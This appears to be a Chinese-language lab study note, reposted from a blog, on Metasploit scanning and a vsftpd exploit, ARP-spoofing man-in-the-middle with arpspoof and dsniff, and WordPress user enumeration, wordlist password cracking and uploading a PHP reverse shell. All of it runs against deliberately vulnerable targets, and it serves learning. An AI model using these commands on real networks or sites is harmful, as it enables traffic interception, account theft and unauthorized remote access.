11.metasploit辅助模块----基本Exp----ARP欺骗中间人MITM----WordPress破解

metasploit辅助模块

信息收集 auxiliary scanners

使用metasploitable靶机
桥接 同一局域网

msfconsole
nmap -sT 靶机IP
nmap -sS 靶机IP  隐身扫描

search ssh_version
use 辅助模块地址
options
set RHOSTS 靶机ip
set THREADS 100
run

基本Exp

metasploit 基本exp利用

zenmap 扫描
msfconsole
从第一个服务端口开始
search vsftpd
use exploit模块
options
set 都设置好
run 或者 exploit
uname -a
ls

ARP欺骗中间人MITM

ARP欺骗 中毒 中间人 MITM 这些术语都是一个意思

双终端同步         wifi   用  wth0
arpspoof -i eth0 -t 蓝队IP 网关IP   //告诉别人,我是网关
arpspoof -i eth0 -t 网关IP 蓝队IP   //告诉网关,我是别人
dsniff       //捕获流量
wireshark大鲨鱼分析流量包

WordPress破解

下载wordpress靶机:https://www.turnkeylinux.org/wordpress
https://blog.csdn.net/CliffordR/article/details/86632754

192.168.1.108/wp-admin/
wpscan         扫描
wpscan --help
wpscan -u 靶机IP -e u vp 
wpscan -u 靶机IP -e u --wordlist /root/wordlist.txt
登录
插件-添加-文件管理器  file manager
下载reverse shell php   修改里面的IP和端口     上传到404
168.168.1.108/404
原文地址:https://www.cnblogs.com/sec875/p/11354328.html